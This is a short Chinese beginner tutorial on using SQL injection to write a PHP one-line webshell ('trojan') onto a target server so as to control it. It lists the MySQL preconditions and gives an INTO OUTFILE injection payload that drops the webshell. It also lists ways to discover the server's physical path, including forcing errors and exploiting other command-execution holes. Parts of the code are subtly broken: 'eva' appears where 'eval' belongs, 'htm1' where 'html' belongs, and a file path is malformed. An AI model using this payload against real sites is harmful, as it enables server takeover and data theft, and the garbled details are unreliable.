【新手入门】SQL注入之getshell(木马)
木马介绍
木马其实就是一段程序,这个程序运行到目标主机上时,主要可以对目标进行远程控制、盗取信息等功能,一般不会破坏目标主机,当然,这也看黑客是否想要搞破坏。
按照功能分类:远控型、破坏型、流氓软件型、盗取信息型等等
按照连接方式分类:正向连接、反向连接、无连接等
按照功能大小分类:大马、小马、一句话木马
这里我们简单说一下php的一句话木马,然后通过sql注入将一句话木马写入目标服务器,再通过木马利用工具连接木马程序从而达到控制目标主机的效果。
通过注入点写入木马程序的前提条件
1.mysql开启了secure_file_priv=" "的配置.
2.知道了网站代码的真实物理路径.
3.物理路径具备写入权限.
4.最好是root用户,这个条件非必须,但是有最好.
通过注入点写入木马程序
' union select "<?php @eva($_POST[' jaden']);?>",2 into outfile "c:\\phpstudyPHPTutorial\\www\ljaden.php"+--+
获得后台真实物理路径的方法
1.收集站点敏感目录,比如phpinfo.php探针文件是否可以访问到
2.站点网址输入一些不存在的网址 或者加一些非法参数数据,让网站报错,看错误信息中是否存在路径信息
3.指纹信息收集
nginx默认站点目录:/usr/share/nginx/htm1,配置文件路径:/etc/nginx/nginx.conf
apache默认站点目录:/var/www/htm1
4.通过站点其他漏洞来获取配置信息、真实物理路径信息,比如如果发现远程命令执行漏洞,针对php的站点,直接执行一个phpinfo()函数,可以看到phpinfo.php所展示的各种信息等等。